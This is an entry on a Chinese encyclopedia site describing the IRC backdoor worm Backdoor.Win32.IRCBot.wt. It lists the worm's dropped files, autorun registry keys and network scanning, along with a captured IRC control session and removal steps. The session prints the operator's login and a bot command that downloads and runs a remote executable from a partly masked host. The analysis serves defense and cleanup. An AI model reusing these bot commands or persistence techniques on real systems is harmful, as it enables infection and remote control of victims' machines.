请输入您要查询的百科知识:

 

词条 Backdoor.Win32.IRCBot.wt
释义

该病毒运行后,衍生病毒文件到系统目录下,添加注册表自动运行项以随机引导病毒体。自动下载某文件以改动 IE 主页,创建大量线程用于扫描用户所在网络,若发现存在默认共享或弱口令则传播自身。此病毒为一个利用 Windows 平台下 IRC 协议的网络蠕虫,受感染用户可能会被操纵进行 Ddos 攻击、远程控制、发送垃圾邮件、创建本地 Tftp 等行为,由于大量消耗系统资源,病毒运行时间过长,将导致系统停止响应。

病毒信息

病毒名称: Backdoor.Win32.IRCBot.wt

中文名称: IRC后门

病毒类型: 后门类

文件 MD5: 36288D10F5FC1B922386CA500DF010EB

公开范围: 完全公开

危害等级: 5

文件长度: 569,344 字节

感染系统: WinNT4以上系统

开发工具: Microsoft Visual C++ 6.0

命名对照: SOPHOS[W32/Rbot-GDD]

行为分析

1 、衍生下列副本与文件:

%System32%\\algose32.exe

%Win$%\\hp.exe 此文件用以改变 IE 主页设置

2 、新建注册表键值:

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\

Run\\Offices Monitorse

Value: String: "C:\\WINDOWS\\System32\\algose32.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\

Run\\Offices Monitorse

Value: String: "C:\\WINDOWS\\System32\\algose32.exe"

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SessionManager\\

PendingFileRenameOperations

Value: Type: REG_MULTI_SZ Length: 121 (0x79) bytes

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SessionManager\\

PendingFileRenameOperations

Value: Type: REG_MULTI_SZ Length: 121 (0x79) bytes

3 、修改注册表键值:

HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page

New: String: "http://www.h*ti*f*link.com"

Old: String: "about:blank"

修改下列注册表键值,用以标记已感染

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\EnableDCOM

New: String: "N"

Old: String: "Y"

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

4 、创建大量扫描线程用以扫描存在文件共享的目标主机。例如:

Tcp LocalHosIPt:2207 DestHostIP:445 SYN_SENT

Tcp LocalHosIPt:2207 DestHostIP:445 LISTENING

…………….

5 、IRC 服务端可响应下列命令:

Join

Nick

Kick

Part

Quit

Open [shell]: file opened:

6 、自动连接的 IRC 服务器:

Tcp->Generic(8080) ServerIP:6*.1*9.28.1*0

7 、连接 IRC 服务器后进行如下操作:

MODE [XP]|28094572 +n+B

JOIN #!e! dark( 频道名称 )

:irc.foonet.com 501 [XP]|28094572 :Unknown MODE flag

:irc.foonet.com NOTICE [XP]|28094572 :BOTMOTD File not found

:[XP]|28094572 MODE [XP]|28094572 :+B

:[XP]|28094572!feicdnye@3D32CD61.A821492B.DAFC72B.IP JOIN :#!e!

:irc.foonet.com 332 [XP]|28094572 #!e! :#advscan netapi 220 6 0 -r -b -s

:irc.foonet.com 333 [XP]|28094572 #!e! x2 1175433849

:irc.foonet.com 353 [XP]|28094572 @ #!e! :[XP]|28094572 @x

:irc.foonet.com 366 [XP]|28094572 #!e! :End of /NAMES list.

:irc.foonet.com 302 [XP]|28094572 :[XP]|28094572=+feicdnye@2*2.1*1.7.2*3

:irc.foonet.com 501 [XP]|28094572 :Unknown MODE flag

:irc.foonet.com 302 [XP]|28094572 :[XP]|28094572=+feicdnye@2*2.1*1.7.2*3

:irc.foonet.com 501 [XP]|28094572 :Unknown MODE flag

:x!adanali@fbi.com PRIVMSG [XP]|28094572 :#login f**keremr3

:x!adanali@fbi.com PRIVMSG [XP]|28094572 :#sk4ni

http://2*7.*8.1*2.1*2/~rocksont/hp.exe c:\\hp.exe 1

PRIVMSG x :[uRxBot]: Password Accepted.

*/ 下载 hp.exe 到目标目录,此文件用以改变 IE 主页设置 */

PRIVMSG x :[DOWNLOAD] 'http://2*7.*8.1*2.1*2/~rocksont/

hp.exe' to 'c:\\hp.exe'

PRIVNSG x :[DOWNLOAD] OK ('http://2*7.*8.1*2.1*2/~rocksont/

hp.exe' to'c:\\hp.exe')

PRIVMSG x :[DOWNLOAD] PROCESS CREATED ('c:\\hp.exe')

:irc.foonet.com 421 [XP]|28094572 PRIVNSG :Unknown command

8 、改变后的主页为 http://www.h*ti*f*link.com/(2*8.9*.*3.1*1)

修改系统文件

注: % System% 是一个可变路径。病毒通过查询操作系统来决定当前 System 文件夹的位置。 Windows2000/NT 中默认的安装路径是 C:\\Winnt\\System32 , windows95/98/me 中默认的安装路径是 C:\\Windows\\System , windowsXP 中默认的安装路径是 C:\\Windows\\System32 。

--------------------------------------------------------------------------------

清除方案

1 、 使用安天木马防线可彻底清除此病毒 ( 推荐 )

2 、 手工清除请按照行为分析删除对应文件,恢复相关系统设置。

(1) 使用 安天木马防线结束下列进程:

algose32.exe

(2) 恢复病毒修改的注册表项目,删除病毒添加的注册表项。

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run\\Offices Monitorse

Value: String: "C:\\WINDOWS\\System32\\algose32.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\Run\\Offices Monitorse

Value: String: "C:\\WINDOWS\\System32\\algose32.exe"

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\

SessionManager\\PendingFileRenameOperations

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\EnableDCOM

New: String: "N"

Old: String: "Y"

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\

Lsa\\restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\

Lsa\\restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

(3) 删除病毒释放文件

%System32%\\algose32.exe

%Win$%\\hp.exe

随便看

 

百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。

 

Copyright © 2004-2023 Cnenc.net All Rights Reserved
更新时间:2024/12/23 0:00:20